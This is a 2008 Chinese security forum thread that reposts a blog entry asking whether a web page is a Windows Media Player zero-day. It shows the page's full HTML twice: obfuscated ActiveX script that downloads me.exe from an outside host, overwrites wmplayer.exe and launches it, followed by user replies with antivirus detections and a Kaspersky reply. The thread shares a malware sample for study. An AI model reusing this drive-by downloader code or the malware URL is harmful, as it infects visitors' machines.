下一个到来的会是Windows Media Player 0day吗？

显示全部楼层 · 发表于 2008-5-17 19:24:18

本文来自死性不改的博客 http://www.clxp.net.cn 转载请保留此申明！

今天看蔚蓝彩虹提供的病毒地址，，无意发现这么一个情况，但是自己测试没成功。。不知道是不是下一个非常广泛被利用的0day。我只是对安全方面有爱好。但是没深入系统的学习过。。在此提出希望不会收到大家的萝卜白菜。。
完整代码

程序代码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Windows Media Player Oday Test!</title>
</head>
<textarea id="code" style="display:none">
var h=new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50");
h.open("GET","http://www.30356769.cn/killbase/me.exe";,false);
h.send();
var s=new ActiveXObject("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");
s.type=1;
s.open();
s.write(h.Responsebody);
s.savetofile("c:\\program files\\windows media player\\wmplayer.exe",2);
s.close;
location.href="\x6d\x6d\x73\x3a";
</textarea>
<script>
var url=document.all.code.value;
url=url.replace(/\r\n/g,"");
url=url.replace(/\\/g,"\\\\");
url=url.replace(/\"/g,"\\\"");
url=url.replace(/\//g,"%2f");
window.open("file:java script:eval(decodeURI(\""+url+"\"))","\x5f\x6d\x65\x64\x69\x61");
</script>
<body>
<p>黑网之神修改</p>
<p>hi.baidu.com/sksgod</p>
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Windows Media Player Oday Test!</title>
</head>
<textarea id="code" style="display:none">
var h=new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50");
h.open("GET","http://www.30356769.cn/killbase/me.exe";,false);
h.send();
var s=new ActiveXObject("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");
s.type=1;
s.open();
s.write(h.Responsebody);
s.savetofile("c:\\program files\\windows media player\\wmplayer.exe",2);
s.close;
location.href="\x6d\x6d\x73\x3a";
</textarea>
<script>
var url=document.all.code.value;
url=url.replace(/\r\n/g,"");
url=url.replace(/\\/g,"\\\\");
url=url.replace(/\"/g,"\\\"");
url=url.replace(/\//g,"%2f");
window.open("file:java script:eval(decodeURI(\""+url+"\"))","\x5f\x6d\x65\x64\x69\x61");
</script>
<body>
<p>黑网之神修改</p>
<p>hi.baidu.com/sksgod</p>
</body>
</html>

<title>Windows Media Player Oday Test!</title>
不久之后可能就变为
<title>Windows Media Player Oday !</title>

下一个到来的会是Windows Media Player 0day吗？ - 死性不改's Blog~
http://www.clxp.net.cn/article.asp?id=1219#top

显示全部楼层 · 发表于 2008-5-17 19:26:26

Starting the file scan:

Begin scan in 'E:\AV\me.exe'
E:\AV\me.exe
[DETECTION] Is the Trojan horse TR/Downloader.Gen
[NOTE] The file was deleted!

显示全部楼层 · 发表于 2008-5-17 19:27:32

C:\Documents and Settings\Administrator\桌面\me.exe Heuri.Suspicious.ERNM 启发式扫描还未处理

显示全部楼层 · 发表于 2008-5-17 19:43:48

显示全部楼层 · 发表于 2008-5-17 20:10:54

McAfee Generic QHosts.a.gen

显示全部楼层 · 发表于 2008-5-17 20:16:48

TO KL

显示全部楼层 · 发表于 2008-5-17 21:37:33

一个下载者，会下载些东西，但很多链接已经失效。

显示全部楼层 · 发表于 2008-5-17 22:21:22

Hello.
New malicious software was found in the attached file.
Its detection will be included in the next update. Thank you for your help.
-----------------
Regards, Vladimir Lebedev
Virus Analyst, Kaspersky Lab.

Ph.: +7(095) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com http://www.viruslist.com

> Attachment: me.rar
[:1:]

显示全部楼层 · 发表于 2008-5-17 23:02:05

俺想知道是否是0DAY。。。

显示全部楼层 · 发表于 2008-5-17 23:05:47

TF已知....饿...

[病毒样本] 下一个到来的会是Windows Media Player 0day吗？

http://www.30356769.cn/killbase/me.exe

本帖子中包含更多资源

本帖子中包含更多资源

http://www.30356769.cn/killbase/me.exe